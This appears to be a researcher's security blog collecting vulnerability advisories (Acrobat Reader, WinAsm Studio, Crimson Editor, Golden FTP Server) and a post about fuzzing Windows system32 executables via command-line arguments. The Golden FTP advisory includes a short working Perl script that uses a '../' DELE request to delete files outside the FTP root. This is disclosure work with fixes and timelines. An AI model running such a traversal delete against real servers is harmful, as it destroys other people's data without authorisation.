blog.sat0ri.com

Summary

A vulnerability has been discovered in Acrobat Reader, which can be exploited by malicious, anonymous individuals to compromise a vulnerable system.

The integer overflow in the CoolType.dll module is caused when parsing the “maxCompositePoints” field value in the TrueType font’s Maximum Profile table (maxp), and can be exploited to corrupt memory via a maliciously constructed PDF file.

Successful exploitation of this vulnerability enables execution of arbitrary code.

Affected Versions

This vulnerability is confirmed in the following versions:

• Acrobat Reader 9.3.3

Prior versions may also be affected.

Screen Dumps

The following video illustrates this issue:

Resolution

Update to version 9.3.4

• http://www.adobe.com/support/security/bulletins/apsb10-17.html

Credits

• Vulnerability identified by Charlie Miller
• Working exploit by Nicklas Wolff of CSIS

References

• Adobe
• CSIS
• CVE-2010-2862

Looking at some of the components present within the %systemroot%\system32 directory can be fun when attempting to identify low-hanging-fruit-vulnerabilities. I made a simple fuzzer that enumerated all executables within a given directory and attempted to execute them with user-defined arguments. A more advanced method also supported by the tool, is to specify the arguments for a given executable in the fuzzer’s configuration file and allow it to run the programme based on the configuration options.

A sample configuration might resemble the following:

<?xml version="1.0" encoding="iso-8859-1"?>
<configuration>
<session>
<top><![CDATA[C:/]]></top>
<denyrules>
<rule><![CDATA[Documents]]></rule>
<rule><![CDATA[Unencrypted]]></rule>
<rule><![CDATA[ie7updates]]></rule>
<rule><![CDATA[Installer]]></rule>
<rule><![CDATA[cmd.exe]]></rule>
</denyrules>
<extensions>
<extension value="exe" />
</extensions>
<!-- Add specific programmes and their arguments below -->
<!-- Arguments with values are followed with a "+" -->
<!-- Arguments that must be present are followed with a "!" -->
<!-- The first byte is the char that is used when giving arguments. -->
<!-- Some will be a forward slash and others a hyphen -->
<programmes enabled="0">
<programme name="C:/path/to/executable.exe" arguments="/l:+;/s:!;" />
</programmes>
</session>
<files>
<output>db.xml</output>
<errors>errors.xml</errors>
</files>
</configuration>

After a few practice, fine-tuning runs, I ran the tool in the %systemroot%\system32 directory and went to make myself a cup of tea. About five or ten minutes later I came back to find the debugger attached to the following 6 processes:

• mrinfo.exe
• locator.exe
• eventvwr.exe
• netsetup.exe
• odbcconf.exe
• sdbinst.exe

what does this mean? Well it means that the tool caused some kind of exception in the programmes to occur. Looking at the debugger, if we have a closer look at the contents of the registers and state of the stack (which was the cause of the exceptions) we can see that the data passed to the programme via the command-line is the culprit here. For the sake of illustration, lets have a look at some screen-dumps of some of the exceptions and the executables in which they occured.

mrinfo.exe:

locator.exe:

eventvwr.exe:

netsetup.exe:

sdbinst.exe:

If we have a closer look at the vulnerabilities mentioned above, we can see that they are all a result of improper bounds checking when reading command-line arguments. This is quite a common error, not only in the components mentioned above, but also in many other applications, which take arguments/data and/or options via the command-line.

Can this type of vulnerability be exploited to introduce a remote code execution vulnerability? The answer is, some will and some will not. All of the issues presented above, will require that the vulnerable programme is executed with a malicious command-line argument in order to cause any damage, and this is just not a realistic scenario. This could be done by sending a maliciously constructed scripting file to the user and attempting to trick him/her into executing it but again, this is highly unlikely, as scripting files are considered un-safe and will not likely make it to the user, due to restrictions within the software packages (e.g. e-mail and instant messaging clients, etc.) via which the attacker will possibly try to send the malicious scripting file. In other words, there is not vector.

Some of you may be asking how long the vulnerabilities mentioned above have been common knowledge and the answer is, a very long time. Most of these vulnerabilities are well known and date back to as far as 2002 and 2003. The only recent issue is the one identified in the Rpc locator executable, which I reported to Microsoft on the 24th of May 2010. You can expect no fixes for any of these issues as the likelihood of them being exploited is very low due to the previously mentioned, non-existing attack vector.

While fuzzing is fun, it’s just not good enough when attemtping to identify more complex vulnerabilities. Specially crafted payloads required to reach a specific branch of code-execution will require an in-depth analysis of the functionality. This in-depth analysis will enable you to construct just the right composition of data that will ensure your data’s contact with the vulnerable code, and this is when things really start to happen.

For fun, I have written a small PoC, which calls the Rpc locator executable with a long command-line argument. It can be downloaded here: Rpc Locator PoC (68)

Summary

A vulnerability has been discovered in WinAsm Studio, which can be exploited by malicious, anonymous individuals to compromise a vulnerable system.

The vulnerability is caused as a result of improper bounds checking when reading *.WAP files. This can be exploited to cause a stack-based buffer overflow by tricking a user into opening a maliciously constructed WinAsm project.

Successful exploitation of this vulnerability enables execution of arbitrary code.

Affected Versions

This vulnerability is confirmed in the following versions:

• WinAsm Studio 5.1.8.0

Other versions may also be affected.

Screen Dumps

The following screen dump illustrates this issue:

Resolution

There is currently no fix for this issue.

Time-line

• Vulnerability identified: 20.05.10
• Vendor informed: 27.05.10
  
• Vendor fix: Currently unavailable

References

• SATA200510.PDF (63)
• WinAsm Home

Summary

A vulnerability has been discovered in WinAsm Studio, which can be exploited by malicious, anonymous individuals to compromise a vulnerable system.

The vulnerability is caused as a result of improper bounds checking when reading *.RC files. This can be exploited to cause a stack-based buffer overflow by tricking a user into opening a maliciously constructed WinAsm project.

Successful exploitation of this vulnerability enables execution of arbitrary code.

Affected Versions

This vulnerability is confirmed in the following versions:

• WinAsm Studio 5.1.8.0

Other versions may also be affected.

Screen Dumps

The following screen dump illustrates this issue:

Resolution

There is currently no fix for this issue.

Time-line

• Vulnerability identified: 01.04.10
• Vendor informed: 06.04.10
• Vendor fix: Currently unavailable

References

• SATA010410.PDF (68)
• WinAsm Home

Summary

A vulnerability has been discovered in Crimson Editor, which can be exploited by malicious, anonymous individuals to compromise a vulnerable system.

The vulnerability is caused as a result of improper bounds checking when reading words from dictionary files. This can be exploited to cause a stack-based buffer overflow by tricking a user into using a maliciously constructed dictionary file.

Successful exploitation of this vulnerability enables execution of arbitrary code.

Affected Versions

This vulnerability is confirmed in the following versions:

• Crimson Editor SVN263 English
• Crimson Editor 3.70 Release (Freeware)

Other versions may also be affected.

Screen Dumps

The following screen dump illustrates this issue:

Resolution

Update to Crimson Editor SVN286 English:

• http://sourceforge.net/projects/emeraldeditor/

Time-line

• Vulnerability identified: 02.01.10
• Vendor informed: 25.03.10
• Vendor fix: 02.04.10

References

• SATA020110.PDF (73)
• Crimson Editor Home
• Emerald Support Forum
• Emerald Editor Forum

Summary

An input validation error has been discovered in Golden FTP Server, which can be exploited by malicious, anonymous individuals to delete arbitrary files.

The vulnerability is caused by an error in the way FTP “DELE” requests are handled. This can be exploited to escape the FTP root and delete arbitrary files on the affected system by using the “../” character sequence.

Successful exploitation of this vulnerability requires that the “Enable full control” option is enabled.

Affected Versions

This vulnerability is confirmed in the following versions:

• Golden FTP Server 4.30 Free
• Golden FTP Server 4.30 Professional

Other versions may also be afected.

Exploit Example

use strict;
use Net::FTP

my $ftp = Net::FTP->new(“192.168.1.35″, Debug => 1) || die $@;

$ftp->login(“anonymous”, ‘anonymous@local.host’) || die $ftp->message;

# The FTP root is, via the configuration, set to C:\ftp\public
$ftp->cwd(“/public/”) || die $ftp->message;

# This deletes the file C:\bollocks.txt
$ftp->delete(“../../bollocks.txt”);

$ftp->quit;

$ftp = undef;

Resolution

Update to version 4.70 Free or Professional.

Time-line

• Vulnerability identified: 29.10.09
• Vendor informed: 11.11.09
• Vendor fix: 17.02.10

References

• SATA291009.PDF (68)
• Vendor
• CVE-2009-4194